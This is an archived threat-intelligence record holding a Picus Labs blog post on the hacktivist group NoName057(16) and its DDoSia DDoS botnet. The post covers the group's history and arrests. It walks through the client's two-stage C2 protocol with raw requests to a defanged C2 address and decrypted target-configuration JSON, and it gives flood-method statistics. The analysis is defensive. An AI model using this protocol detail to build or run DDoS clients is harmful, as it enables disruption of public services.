{
	"id": "683258c7-08c3-4cb2-9dc3-3f94f30b4f0d",
	"created_at": "2026-04-06T00:15:16.344215Z",
	"updated_at": "2026-04-10T03:36:45.648198Z",
	"deleted_at": null,
	"sha1_hash": "4912019a1595eb4781fd4917252a45186863b5bd",
	"title": "How NoName057(16) Uses DDoSia to Attack NATO Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64266,
	"plain_text": "How NoName057(16) Uses DDoSia to Attack NATO Targets\r\nBy Picus Labs\r\nPublished: 2025-12-15 · Archived: 2026-04-02 12:47:48 UTC\r\nWho Is NoName057(16)?\r\nNoName057(16), also known as 05716nnm, Nnm05716, NoName057 and NoName05716, is a pro-Russia\r\nhacktivist entity assessed to have originated as a covert project within the Centre for the Study and Network\r\nMonitoring of the Youth Environment (CISM), operating on behalf of the Kremlin. Evidence indicates that CISM\r\nleadership and staff provided the group with extensive support, developing its proprietary DDoS tool known as\r\nDDoSia, supplying the underlying infrastructure, administering its Telegram channels, and directing target\r\nselection.\r\nActive since March 2022, the group primarily conducts distributed denial-of-service attacks against government\r\nand private-sector organizations in NATO member states and other European countries viewed as adversarial to\r\nRussian geopolitical goals. Its operations rely heavily on Telegram for coordination and dissemination, while\r\nhosting tools and tactics on platforms such as GitHub to mobilize followers.\r\nBy 2024, NoName057(16) expanded its reach through close collaboration with other pro-Russia hacktivist groups,\r\nmost notably the Cyber Army of Russia Reborn (CARR). This partnership produced a joint chat by mid-year and\r\nculminated in shared claims of an intrusion targeting operational-technology assets in the United States. Their\r\nincreasing operational overlap eventually contributed to the formation of Z-Pentest in September 2024, a hybrid\r\ngroup consisting of administrators and operators from both communities. 
Z-Pentest has continued to reference\r\nNoName057(16) in its own campaigns, signalling sustained influence.\r\nThe group is also referenced by regional designators such as \"NoName057(16) Spain,\" \"NoName057(16) Italy,\"\r\nand \"NoName057(16) France\" [1].\r\nIn July 2025, NoName057(16) became the focus of Operation Eastwood, a coordinated international law\r\nenforcement effort conducted from July 14 to July 17. Authorities made two arrests, one in France and one in\r\nSpain. Seven arrest warrants were issued, six by Germany and one by Spain. In addition, 24 house searches took\r\nplace across Czechia, France, Germany, Italy, Poland, and Spain. Following the operation, the group’s official\r\nTelegram channel dismissed the actions, encouraged followers to reject what it called misinformation from foreign\r\nservices, and reaffirmed its ongoing commitment to information operations in support of Russia [2].\r\nWhat is DDoSia?\r\nEmerging shortly after the onset of the conflict in Ukraine, NoName057(16) operates as a digitally partisan entity\r\naligned with Russian strategic interests. The group's primary offensive capability, the DDoSia Project, is the\r\nsuccessor to the earlier \"Bobik\" botnet. 
The project relies on volunteers who are recruited via Telegram, provided\r\nwith the necessary toolkit, and incentivized through cryptocurrency rewards.\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 1 of 6\n\nThe DDoSia client is developed in Go and is designed for ease of use, allowing individuals with minimal\r\ntechnical expertise to participate in attacks.\r\nTechnical Analysis: The DDoSia Kill Chain\r\nThe operational flow of the DDoSia client involves a two-stage communication process with the Command and\r\nControl (C2) server to retrieve target configurations [2].\r\nStage 1: Client Login and Authentication\r\nCommunication is initiated by the client sending an HTTP POST request to the C2 server's /client/login endpoint.\r\nThis step is used to register the client instance and validate its authenticity.\r\nA critical component is the Cookie header, which transmits the User Hash (U) and the Client ID (C). The body of\r\nthe request contains encrypted system information, including the OS, kernel version, and CPU details.\r\nPOST /client/login HTTP/1.1\r\nHost: 38.180.143[.]83\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like\r\nGecko) Mobile/15E148 [LinkedInApp]/9.28.7586\r\nContent-Length: 515\r\nAccept: text/html,application/xhtml+xml,application/xml,\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/json\r\nCookie: U=\u003cREDACTED\u003e; C=\u003cREDACTED\u003e\r\n{\"body\": 
\"Eo+B/j5dX0s7QoVL+74DQxkUqE460PLgskFIPfAKzr4DHK6hpoYbe74kkXJLub90SKfSt\r\nAlmrXv47570ygFXvR89IYbjay9rzxdpNBMWEaQYag7SE6z4Ge3iqnMvN3rGRvrUI50cqcbl0Jzbav7\r\nKmzvt3k0H+eYgwjOI8OnG3Fuuhp+xOkPjakOmJkLrJJOTompsrIsiK7dbtFG08xp8R04S+YnCqCgRu\r\nfYpHmQLJ0IpNy4+MKyfpzDL0bv46SSqcLZuFZdZHzaUdRjHCAglbdGNYDMeO8FU93xWbh6k/3KPk8u\r\n5pXgSHNvLc11Ly+EddgeWjJr8qZDRr/N/HL3bhLLNqBFKKOj04aWnbg7FdspSbyF70ReIAEr2utUc7\r\neKAPbc6eXa2g5YcsclgdCJlofc0SvNZ7wiXdnkI11XRTAvaX/drsLvjAJmJ58YF2H471mVvaBIjGmV\r\n2N8iglErdoHRegy7F0F1x5b6SHbcLQ5KL836olsl/722a\"}\r\nThe payload is encrypted using AES-GCM, with a key dynamically generated from the User Hash and Client ID.\r\nUpon decryption, the JSON structure reveals the detailed system fingerprint of the volunteer's machine.\r\n{\r\n    \"key\": \"\u003cREDACTED\u003e\",\r\n    \"user\": \"\u003cREDACTED\u003e\",\r\n    \"client\": \"\u003cREDACTED\u003e\",\r\n    \"inf\": {\r\n        \"SystemUserName\": \"DESKTOP-QOG2741\",\r\n        \"OS\": \"windows\",\r\n        \"KernelVersion\": \"10.0.19041.2965 Build 19041.2965\",\r\n        \"KernelArch\": \"x86_64\",\r\n        \"PlatformFamily\": \"Standalone Workstation\",\r\n        \"CPUCores\": 8,\r\n        \"RegisterTime\": \"2025-07-10T14:22:18.134954+01:00\",\r\n        \"Timezone\": \"CEST\"\r\n    }\r\n}\r\nSuccessful authentication is acknowledged by the C2 server with a 200 OK response containing a UNIX\r\ntimestamp.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: Fri, 14 Jun 2024 15:18:17 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 19\r\nConnection: keep-alive\r\n1718378297196554765\r\nStage 2: Target Acquisition\r\nFollowing registration, the client initiates the second stage to retrieve the attack configuration via a GET request to\r\n/client/get_targets. 
\r\nGET /client/get_targets HTTP/1.1\r\nHost: 38[.]180[.]143[.]83\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1\r\nAccept: text/html,application/xhtml+xml,application/xml,\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/json\r\nCookie: U=\u003cREDACTED\u003e; C=\u003cREDACTED\u003e; K=NUYZ627M42\u003cREDACTED\u003eDMA6NLJ4YAM======\r\nThe C2 server responds with an encrypted JSON object containing the target list, utilizing the same AES-GCM\r\nencryption method established during the login phase.\r\n{\"data\":\"aCeegN8A+CvFX11L17b8dZpk67zwVZtTMR8R0ZhDrn3rNpFTq55dyjJ2pw8etiyLlW3SI\r\nr8c3XVcmBpjzNXdHZYyqi8SVByLp4clIi+7gGT84...\u003cREDACTED\u003e.../rblN+dJq8037tw9y7Htnapy\r\n887JRLFP0ao83w1YYed3jvjwFWWCu0vMvTjjKzuxXPDFb8KXWUMJw==\"}\r\nDecryption of this payload reveals two primary keys: targets and randoms. The targets array specifies the victim\r\nhost, port, and attack protocol (e.g., http2), while randoms defines parameters for generating variable data to\r\nappend to requests, a technique likely employed to bypass caching and simple filtering mechanisms.\r\n{\r\n    \"targets\": [\r\n        {\r\n            \"target_id\": \"64865791f747b0b90020d960\",\r\n            \"request_id\": \"64865791f747b0b90020d961\",\r\n            \"host\": \"\u003cREDACTED\u003e\",\r\n            \"ip\": \"\u003cREDACTED\u003e\",\r\n            \"type\": \"http2\",\r\n            \"method\": \"GET\",\r\n            \"port\": 443,\r\n            \"use_ssl\": true,\r\n            \"path\": \"\",\r\n            \"body\": {\r\n                \"type\": \"str\",\r\n                \"value\": \"\"\r\n            },\r\n            \"headers\": null\r\n        }\r\n    ],\r\n    \"randoms\": [\r\n        {\r\n            \"name\": 
\"\\u0422\\u0435\\u043b\\u0435\\u0444\\u043e\\u043d\",\r\n            \"id\": \"62d8286fddcbb37b0c77c87f\",\r\n            \"digit\": true,\r\n            \"upper\": false,\r\n            \"lower\": false,\r\n            \"min\": 11,\r\n            \"max\": 11\r\n        }\r\n    ]\r\n}\r\nInfrastructure and Operational Security\r\nA resilient, multi-tiered infrastructure is employed to protect the backend servers from discovery and mitigation\r\n[2].\r\nTier 1 (C2 Servers): These are public-facing servers that communicate directly with DDoSia clients on Port\r\n80. They act as ephemeral proxies, with an average lifespan of approximately nine days, though many are\r\nrotated daily.\r\nTier 2 (Backend Servers): These servers host the core logic and target lists. Access is strictly controlled via\r\nAccess Control Lists (ACLs), which only permit connections from known Tier 1 servers.\r\nThis configuration ensures that even if Tier 1 nodes are identified and blocked, the core infrastructure remains\r\nsecure and operational.\r\nOperational Tempo and Targeting\r\nAnalysis of activity between July 2024 and July 2025 reveals a high operational tempo, with an average of 50\r\nunique targets attacked daily. Activity patterns strongly correlate with a standard Russian work schedule. New\r\ntargets are consistently added in two daily waves: a primary surge between 05:00 and 07:00 UTC and a secondary\r\nwave around 11:00 UTC.\r\nSectoral and Geographic Focus\r\nTargeting is heavily concentrated on European nations opposing Russia's invasion of Ukraine. Geographically,\r\nUkraine accounts for the largest share of attacks at 29.47%, followed by France at 6.09%, Italy at 5.39%, Sweden\r\nat 5.29%, and Germany at 4.60%. \r\nIn terms of industry distribution, the Government and public sectors are the primary targets, comprising 41.09% of\r\nincidents. 
This is followed by transportation and logistics at 12.44% and telecommunications at 10.19% [2].\r\nAttack Techniques\r\nA combination of volumetric and resource-exhaustion attacks is utilized to disrupt services. The most common\r\nmethods include TCP Floods, specifically SYN floods at 17.6% and ACK floods at 16.1%, as well as Application\r\nLayer Attacks such as HTTP GET floods at 15.4%. Slow Loris variants, identified as nginx_loris, account for\r\n31.5% of the activity and operate by exhausting server connection slots through partial HTTP requests sent at a\r\nslow rate.\r\nAdditionally, Port 443 (HTTPS) and Port 80 (HTTP) account for the vast majority of attack traffic at 66%,\r\nreflecting a distinct focus on web-facing services [2].\r\nHow Picus Simulates NoName057(16) Attacks?\r\nWe also strongly suggest simulating NoName057(16) Attacks to test the effectiveness of your security controls\r\nagainst real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against\r\nhundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.\r\nPicus Threat Library includes the following threats for NoName057(16):\r\nThreat ID Threat Name Attack Module\r\n32591 DDOSIA DDoS Malware Email Threat Network Infiltration\r\n51123 DDOSIA DDoS Malware Download Threat Network Infiltration\r\nStart simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus\r\nSecurity Validation Platform.\r\nKey Takeaways\r\nNoName057(16) originated as a covert project within the Kremlin-backed CISM, targeting NATO and\r\nEuropean entities since March 2022.\r\nThe group relies on the DDoSia project, a crowdsourced botnet that rewards volunteers with\r\ncryptocurrency for launching attacks using simple, Go-based tools.\r\nTechnical operations involve a two-stage 
kill chain where clients authenticate and retrieve encrypted target\r\nlists from Command and Control servers via AES-GCM.\r\nA multi-tier architecture uses ephemeral public proxies to shield backend servers from direct detection and\r\nmitigation.\r\nPartnerships with the Cyber Army of Russia Reborn led to the formation of the hybrid group Z-Pentest in\r\n2024, expanding operations to US operational technology targets.\r\nAttacks predominantly focus on government sectors in Ukraine, France, and Italy, with activity surges\r\naligning with standard Russian work schedules.\r\nOperation Eastwood executed international arrests and searches against the group in July 2025, though the\r\nentity remains active and defiant.\r\nReferences\r\n[1] Accessed: Dec. 12, 2025. [Online]. Available: https://www.cisa.gov/sites/default/files/2025-12/aa25-343a-pro-russia-hacktivists-conduct-attacks.pdf\r\n[2] N. ’s D. Infrastructure, “Anatomy of DDoSia:” Accessed: Dec. 12, 2025. [Online]. Available:\r\nhttps://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0722.pdf\r\nSource: https://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets"
	],
	"report_names": [
		"how-noname05716-uses-ddosia-to-attack-nato-targets"
	],
	"threat_actors": [
		{
			"id": "d58f7d9f-abb3-4e78-a13a-b87399fc03e5",
			"created_at": "2024-04-20T02:00:03.559673Z",
			"updated_at": "2026-04-10T02:00:03.618525Z",
			"deleted_at": null,
			"main_name": "Cyber Army of Russia Reborn",
			"aliases": [],
			"source_name": "MISPGALAXY:Cyber Army of Russia Reborn",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b05a0147-3a98-44d3-9b42-90d43f626a8b",
			"created_at": "2023-01-06T13:46:39.467088Z",
			"updated_at": "2026-04-10T02:00:03.33882Z",
			"deleted_at": null,
			"main_name": "NoName057(16)",
			"aliases": [
				"NoName057",
				"NoName05716",
				"05716nnm",
				"Nnm05716"
			],
			"source_name": "MISPGALAXY:NoName057(16)",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c532a3a-8977-4f5e-aa4f-311e19952e2f",
			"created_at": "2026-03-24T02:00:04.630235Z",
			"updated_at": "2026-04-10T02:00:03.989041Z",
			"deleted_at": null,
			"main_name": "Z-Pentest Alliance",
			"aliases": [
				"Z-Pentest"
			],
			"source_name": "MISPGALAXY:Z-Pentest Alliance",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775792205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.pdf",
		"text": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.txt",
		"img": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.jpg"
	}
}